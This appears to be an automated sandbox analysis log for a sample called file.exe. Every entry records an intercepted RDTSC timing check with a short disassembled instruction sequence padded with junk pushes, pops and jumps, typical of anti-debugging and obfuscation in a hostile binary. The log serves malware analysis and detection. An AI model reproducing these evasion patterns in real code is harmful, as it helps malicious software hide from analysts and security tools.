Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B6F1D second address: 11B6F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD0E506DD0Fh 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B6F36 second address: 11B6F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD0E4E9B9E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B6F42 second address: 11B6F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9E87 second address: 11B9EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD0E4E9B9E6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD0E4E9B9ECh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9EA0 second address: 11B9EB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD12h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C33F0 second address: 11C3401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a js 00007FD0E4E9B9E6h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C3401 second address: 11C3407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C3407 second address: 11C3445 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD0E4E9B9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 jmp 00007FD0E4E9B9ECh 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007FD0E4E9B9F5h 0x0000001f jnc 00007FD0E4E9B9ECh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C3445 second address: 11C3454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C3454 second address: 11C345B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C355C second address: 11C3562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C3562 second address: 11C35CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0E4E9B9F0h 0x00000008 jng 00007FD0E4E9B9E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 js 00007FD0E4E9B9ECh 0x00000019 jg 00007FD0E4E9B9E6h 0x0000001f jmp 00007FD0E4E9B9F3h 0x00000024 popad 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 pushad 0x0000002a jbe 00007FD0E4E9B9ECh 0x00000030 jp 00007FD0E4E9B9E6h 0x00000036 jmp 00007FD0E4E9B9F3h 0x0000003b popad 0x0000003c mov eax, dword ptr [eax] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C35CD second address: 11C35D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C35D1 second address: 11C35E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C7774 second address: 11C7778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C7778 second address: 11C777E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C7CE5 second address: 11C7D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007FD0E506DD12h 0x0000000c jmp 00007FD0E506DD0Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C7D0B second address: 11C7D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C7E87 second address: 11C7E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C7E8B second address: 11C7EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD0E4E9B9FDh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C7EB3 second address: 11C7EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E506DD10h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8143 second address: 11C8148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8148 second address: 11C8160 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD0E506DD13h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8160 second address: 11C8169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8169 second address: 11C816D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C82DA second address: 11C82E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CD6EB second address: 11CD6EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CD6EF second address: 11CD70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD0E4E9B9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FD0E4E9B9EDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CC6D0 second address: 11CC6D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CC6D6 second address: 11CC6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E2C9 second address: 119E2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E2CD second address: 119E2DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E2DB second address: 119E392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD0E506DD17h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FD0E506DD08h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 add edx, dword ptr [ebp+122D3648h] 0x0000002c call 00007FD0E506DD15h 0x00000031 jo 00007FD0E506DD0Ch 0x00000037 mov dword ptr [ebp+122D24D6h], eax 0x0000003d pop ecx 0x0000003e lea eax, dword ptr [ebp+1248001Bh] 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FD0E506DD08h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000014h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e js 00007FD0E506DD0Bh 0x00000064 xor di, 6F46h 0x00000069 nop 0x0000006a ja 00007FD0E506DD1Ah 0x00000070 push eax 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 push edx 0x00000075 pop edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E392 second address: 117A598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD0E4E9B9F7h 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FD0E4E9B9E8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a sub di, 55A2h 0x0000002f je 00007FD0E4E9B9EAh 0x00000035 mov di, 9B3Bh 0x00000039 call dword ptr [ebp+122D3315h] 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 jo 00007FD0E4E9B9E6h 0x00000048 pop esi 0x00000049 push esi 0x0000004a jmp 00007FD0E4E9B9EBh 0x0000004f pop esi 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E764 second address: 119E77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0E506DD06h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jbe 00007FD0E506DD06h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E77D second address: 119E781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E781 second address: FF1928 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FD0E506DD19h 0x0000000d push dword ptr [ebp+122D0595h] 0x00000013 jmp 00007FD0E506DD19h 0x00000018 call dword ptr [ebp+122D23FCh] 0x0000001e pushad 0x0000001f jl 00007FD0E506DD16h 0x00000025 jmp 00007FD0E506DD10h 0x0000002a jg 00007FD0E506DD0Ch 0x00000030 xor eax, eax 0x00000032 pushad 0x00000033 add esi, 02FBCB70h 0x00000039 call 00007FD0E506DD12h 0x0000003e jmp 00007FD0E506DD17h 0x00000043 pop edx 0x00000044 popad 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 jbe 00007FD0E506DD0Dh 0x0000004f je 00007FD0E506DD07h 0x00000055 stc 0x00000056 mov dword ptr [ebp+122D3678h], eax 0x0000005c jnp 00007FD0E506DD12h 0x00000062 mov esi, 0000003Ch 0x00000067 jmp 00007FD0E506DD12h 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 jmp 00007FD0E506DD0Ch 0x00000075 lodsw 0x00000077 mov dword ptr [ebp+122D19C6h], ecx 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 pushad 0x00000082 mov dword ptr [ebp+122D306Ch], esi 0x00000088 popad 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d pushad 0x0000008e mov si, cx 0x00000091 jmp 00007FD0E506DD11h 0x00000096 popad 0x00000097 jmp 00007FD0E506DD0Eh 0x0000009c nop 0x0000009d jng 00007FD0E506DD20h 0x000000a3 pushad 0x000000a4 push eax 0x000000a5 push edx 0x000000a6 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E883 second address: 119E889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E889 second address: 119E88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E88E second address: 119E898 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0E4E9B9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E9EF second address: 119E9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EA91 second address: 119EAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E4E9B9F2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EAA8 second address: 119EAB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0E506DD0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119ED82 second address: 119ED88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119ED88 second address: 119EDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FD0E506DD0Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1E6Bh], ecx 0x00000015 push 00000004h 0x00000017 nop 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EDAB second address: 119EDAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EDAF second address: 119EDC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FD0E506DD08h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119F13F second address: 119F143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119F143 second address: 119F149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119F149 second address: 119F153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD0E4E9B9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119F4C4 second address: 119F4E7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0E506DD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD0E506DD11h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119F4E7 second address: 119F4ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119F4ED second address: 119F578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FD0E506DD10h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD0E506DD08h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+1248005Fh] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FD0E506DD08h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 sub ecx, dword ptr [ebp+122D24EBh] 0x0000004e nop 0x0000004f jmp 00007FD0E506DD15h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FD0E506DD12h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CD094 second address: 11CD0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0E4E9B9E6h 0x0000000a popad 0x0000000b jmp 00007FD0E4E9B9F3h 0x00000010 jns 00007FD0E4E9B9EEh 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D30BE second address: 11D30C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1E61 second address: 11D1E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1E65 second address: 11D1E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1E69 second address: 11D1E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1FE5 second address: 11D1FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D2704 second address: 11D2708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D2B1E second address: 11D2B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FD0E506DD36h 0x0000000b jns 00007FD0E506DD1Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FD0E506DD06h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D2B4F second address: 11D2B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1927 second address: 11D192B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DA943 second address: 11DA96C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FD0E4E9B9E8h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FD0E4E9B9E6h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DBFAA second address: 11DBFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DBFB1 second address: 11DBFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DBFB7 second address: 11DBFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2277 second address: 11E2283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0E4E9B9E8h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2283 second address: 11E2289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2289 second address: 11E228D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0F91 second address: 11E0F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1101 second address: 11E1121 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0E4E9B9F8h 0x00000008 jmp 00007FD0E4E9B9F2h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1260 second address: 11E129A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD0E506DD0Dh 0x00000008 pop ecx 0x00000009 jmp 00007FD0E506DD17h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0E506DD0Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1562 second address: 11E1568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1151459 second address: 1151484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD19h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD0E506DD0Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1151484 second address: 115148E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD0E4E9B9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E6E20 second address: 11E6E25 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E6E25 second address: 11E6E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007FD0E4E9B9E8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD0E4E9B9F2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E710D second address: 11E7121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnc 00007FD0E506DD06h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7121 second address: 11E713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E4E9B9F3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E713A second address: 11E7153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD0E506DD0Bh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7153 second address: 11E715D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD0E4E9B9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EB8A6 second address: 11EB8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EBA19 second address: 11EBA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EBB60 second address: 11EBB65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
